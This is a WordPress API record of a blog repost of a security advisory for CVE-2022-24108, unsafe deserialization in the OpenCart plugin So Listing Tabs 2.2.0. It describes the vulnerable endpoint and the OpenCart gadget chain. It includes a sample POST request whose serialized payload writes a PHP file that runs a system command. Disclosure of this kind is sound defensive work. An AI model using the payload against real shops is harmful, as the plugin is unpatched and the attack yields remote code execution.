{"id":24580,"date":"2022-05-17T22:59:08","date_gmt":"2022-05-17T18:59:08","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167197\/opencartslt220-deserialize.txt"},"modified":"2022-05-28T11:22:22","modified_gmt":"2022-05-28T06:52:22","slug":"opencart-so-listing-tabs-2-2-0-unsafe-deserialization","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/opencart-so-listing-tabs-2-2-0-unsafe-deserialization\/","title":{"rendered":"OpenCart So Listing Tabs 2.2.0 Unsafe Deserialization"},"content":{"rendered":"

[-] Affected Versions:<\/p>\n

Version 2.2.0 is affected, and prior versions are likely affected too.<\/p>\n

[-] Vulnerabilities Description:<\/p>\n

Vulnerable component is switching to another tab. To exploit
\nvulnerability, an attacker may send a POST request (with
\napplication\/x-www-form-urlencoded content-type) to AJAX endpoint
\n(usually “\/index.php”) with “is_ajax_listing_tabs” parameter set to
\n“1” and “setting” parameter containing a PHP-serialized object,
\nwhich would be deserialized at server-side. Gadget-chains based on PHP
\nserver-side code can be used to gain remote code execution, file
\nwrite, DOS, etc.<\/p>\n

So Listing Tabs is an Opencart plugin, so the Opencart PHP classes are
\navailable in webapp lifecycle. In source code of Opencart there is a PHP
\ngadget-chain which allows to write a file to the server.
\nUsing this gadget, an attacker can write .php files with PHP code inside
\napp’s web root and then execute it via requesting them, thus gaining
\nremote code
\nexecution, which makes insecure deserialization in So Listing Tabs
\nespecially dangerous. Ability to write files can also be used to DOS the
\nsystem by writing large files and exhausting disk space, it can be used to
\nperform XSS attacks by creating HTML files inside web root.<\/p>\n

Here is an example of request which will write PHP file on server
\nin \/tmp directory:<\/p>\n


\nPOST \/index.php HTTP\/2
\nHost: 0.0.0.0
\nContent-Length: 3870
\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8
\nReferer: http:\/\/0.0.0.0\/<\/p>\n

is_ajax_listing_tabs=1&ajax_reslisting_start=0&categoryid=p_date_added&
\nsetting=a%3a74%3a{s%3a6%3a”action”%3bs%3a9%3a”save_edit”%3b…
\n…
\ns%3a2%3a”aa”%3bO%3A9%3A%22DB%5CMySQLi%22%3A1%3A%7Bs%3A21%3A%2
\n2%00DB%5CMySQLi%00connection%22%3BO%3A7%3A%22Session%22%3A3%3A%7Bs%3A10%3A%
\n22%00%2A%00adaptor%22%3BO%3A21%3A%22Twig_Cache_Filesystem%22%3A2%3A%7Bs%3A3
\n2%3A%22%00Twig_Cache_Filesystem%00directory%22%3BN%3Bs%3A30%3A%22%00Twig_Ca
\nche_Filesystem%00options%22%3BN%3B%7Ds%3A13%3A%22%00%2A%00session_id%22%3Bs
\n%3A11%3A%22%2Ftmp%2Fff.php%22%3Bs%3A4%3A%22data%22%3Bs%3A24%3A%22%3C%3Fphp+
\nsystem%28%22ls+%2F%22%29%3B+%3F%3E%22%3B%7D%7D}&lbmoduleid=157
\n—<\/p>\n

[-] Solution:<\/p>\n

No official solution is currently available.<\/p>\n

[-] Disclosure Timeline:<\/p>\n

[28\/01\/2022] – CVE number assigned
\n[31\/01\/2022] – Vendor contacted
\n[02\/02\/2022] – Vendor asked for description of vulnerability
\n[02\/02\/2022] – Send report to vendor
\n[11\/02\/2022] – Vendor contacted for asking about updates
\n[11\/02\/2022] – Vendor answered that did not get the report
\n[11\/02\/2022] – Send report again
\n[16\/02\/2022] – Vendor contacted to ask about receiving the report
\n[17\/02\/2022] – Automatic generated answer about overloaded system
\n[07\/04\/2022] – Vendor contacted again asking for updates
\n[15\/05\/2022] – Vendor contacted to notify about public disclosure
\n[16\/05\/2022] – Vendor contacted to notify about public disclosure to
\nenother email
\n[16\/05\/2022] – Public disclosure<\/p>\n

[-] CVE Reference:<\/p>\n

The Common Vulnerabilities and Exposures project (cve.mitre.org)
\nhas assigned the id CVE-2022-24108 to these vulnerabilities.<\/p>\n

[-] Credits:<\/p>\n

Vulnerability discovered by
\nDenis Mironov (SolidSoft LLC),
\nAlexey Smirnov (SolidSoft LLC),
\nDaniil Sigalov (SolidSoft LLC),
\nDmitry Pavlov (SolidSoft LLC),
\nMaxim Malkov (SolidSoft LLC)<\/p>\n","protected":false},"excerpt":{"rendered":"

[-] Affected Versions: Version 2.2.0 is affected, and prior versions are likely affected too. [-] Vulnerabilities Description: Vulnerable component is switching to another tab. To exploit vulnerability, an attacker may send a POST request (with application\/x-www-form-urlencoded content-type) to AJAX endpoint (usually “\/index.php”) with “is_ajax_listing_tabs” parameter set to “1” and “setting” parameter containing a PHP-serialized object, …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24580","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24580"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24580\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}